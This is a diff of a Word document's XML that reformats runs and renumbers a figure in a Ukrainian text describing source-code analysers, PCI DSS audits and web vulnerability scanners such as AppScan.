+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вбудованого</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24323,32 +25090,31 @@
         <w:ind w:left="360" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Рисунок 2.1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Малюнок 1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують </w:t>
+        <w:t xml:space="preserve"> Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24557,13 +25323,21 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+        <w:t xml:space="preserve">ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -24574,7 +25348,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -24589,7 +25362,6 @@
         <w:ind w:left="360" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -24605,7 +25377,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
@@ -24615,7 +25386,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -24633,7 +25403,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -24645,7 +25414,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -24658,7 +25426,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -24680,7 +25447,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24690,7 +25456,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24701,7 +25466,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -24712,28 +25476,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve">: завдяки </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> завдяки цьому він може тестувати додатки побудовані на базі </w:t>
+        <w:t>ч</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ому він може тестувати додатки побудовані на базі </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -24743,7 +25514,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24753,7 +25523,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -24763,7 +25532,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24773,7 +25541,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -24783,52 +25550,29 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">. Протокол </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AMF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Протокол </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>AMF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>також підтримується.</w:t>
+        <w:t xml:space="preserve"> також підтримується.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24844,7 +25588,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24854,7 +25597,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24865,7 +25607,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24876,7 +25617,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -24887,23 +25627,11 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">-адреси та </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>інші дефекти.</w:t>
+        <w:t>-адреси та інші дефекти.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24919,7 +25647,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24929,7 +25656,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24940,34 +25666,11 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>С</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>канування веб-служб: сканування веб-служби є однією з областей</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>, необхідних організаціям для більш ефективної автоматизації.</w:t>
+        <w:t>Сканування веб-служб: сканування веб-служби є однією з областей, необхідних організаціям для більш ефективної автоматизації.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24983,7 +25686,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -24993,7 +25695,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -25004,7 +25705,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -25015,73 +25715,47 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Appscan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> дозволяє аналізувати </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Appscan</w:t>
+        <w:t>html</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> дозволяє аналізувати </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>html</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>сторінки на предмет вразливостей, та допомагає користувачеві сфокусуватись на проблемах, зосереджених на клієнтській стороні.</w:t>
+        <w:t>-сторінки на предмет вразливостей, та допомагає користувачеві сфокусуватись на проблемах, зосереджених на клієнтській стороні.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25097,7 +25771,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -25106,22 +25779,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Звітність: в</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>иходячи з ваших вимог, ви можете створювати звіти в бажаних форматах і включати потрібні поля в ньому.</w:t>
+        <w:t>Звітність: виходячи з ваших вимог, ви можете створювати звіти в бажаних форматах і включати потрібні поля в ньому.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25137,7 +25799,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -25147,7 +25808,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -25168,7 +25828,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
@@ -25178,90 +25837,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>П</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідтримка </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>інструментів</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>в наявності є</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
